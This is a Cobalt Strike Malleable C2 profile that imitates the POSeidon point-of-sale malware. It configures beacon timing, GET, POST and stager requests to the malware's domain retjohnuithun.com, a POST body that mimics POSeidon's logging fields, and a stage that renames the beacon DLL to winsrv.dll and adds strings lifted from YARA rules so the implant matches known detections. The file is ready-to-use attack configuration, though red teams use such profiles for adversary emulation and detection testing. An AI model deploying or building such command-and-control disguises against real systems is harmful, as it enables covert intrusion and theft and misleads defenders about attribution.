#POSeidon
#taken from --> https://vallejo.cc/2017/07/12/analysis-of-poseidon-downloader-and-keylogger/
#xx0hcd
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; Media Center PC 6.0)";
set dns_idle "8.8.8.8";
set maxdns "235";
http-get {
set uri "/Baked/viewtopic.php";
client {
header "Accept" "*/*";
header "Content-Type" "application/x-www-form-urlencoded";
header "Host" "retjohnuithun.com";
header "Cache-Control" "no-cache";
metadata {
netbios;
prepend "PHPSESSID=";
header "Cookie";
}
}
server {
header "Server" "nginx/1.10.2";
header "Content-Type" "text/html";
header "Connection" "keep-alive";
header "X-Powered-By" "PHP/5.4.38";
output {
netbios;
print;
}
}
}
http-post {
set uri "/baked/viewtopic.php";
client {
header "Accept" "*/*";
header "Content-Type" "application/x-www-form-urlencoded";
header "Host" "retjohnuithun.com";
# header "Cache-Control" "no-cache";
output {
base64;
prepend "logs=";
prepend "vers=13.4&";
prepend "win=6&";
prepend "uinfo=dWluZm8=&";
prepend "uid=692207&";
prepend "oprat=2&";
print;
}
id {
base64url;
# prepend "PHPSESSID=";
header "Cookie";
}
}
server {
header "Server" "nginx/1.10.2";
header "Content-Type" "text/html";
header "Connection" "keep-alive";
header "X-Powered-By" "PHP/5.4.38";
output {
netbios;
print;
}
}
}
http-stager {
set uri_x86 "/ldl01/viewtopic.php";
set uri_x64 "/Ldl01/viewtopic.php";
client {
header "Accept" "*/*";
header "Content-Type" "application/x-www-form-urlencoded";
header "Host" "retjohnuithun.com";
header "Cache-Control" "no-cache";
}
server {
header "Server" "nginx/1.10.2";
header "Content-Type" "text/html";
header "Connection" "keep-alive";
header "X-Powered-By" "PHP/5.4.38";
}
}
stage {
# randomly chosen values
set compile_time "15 Nov 2017 12:24:14";
set image_size_x86 "301000";
transform-x86 {
strrep "beacon.dll" "winsrv.dll";
}
transform-x64 {
strrep "beacon.x64.dll" "winsrv.dll";
}
# the strings below are taken from the YARA rules at --> http://vkremez.weebly.com/cyber-intel/january-18th-2016
stringw "timed out";
stringw "AR6002";
stringw " delete[]";
stringw "horticartf.com";
stringw "CreateSemaphoreExW";
stringw "sma-se";
stringw "smj-NO";
stringw "IsValidLocaleName";
stringw "oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s";
stringw "bad exception";
stringw "_nextafter";
stringw "omni callsig'";
stringw "6d6h6l6p6t6x6";
stringw "DOMAIN error";
stringw "vector copy constructor iterator'";
stringw "- inconsistent onexit begin-end variables";
stringw "Monday";
stringw "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) x";
stringw "horticartf.com";
}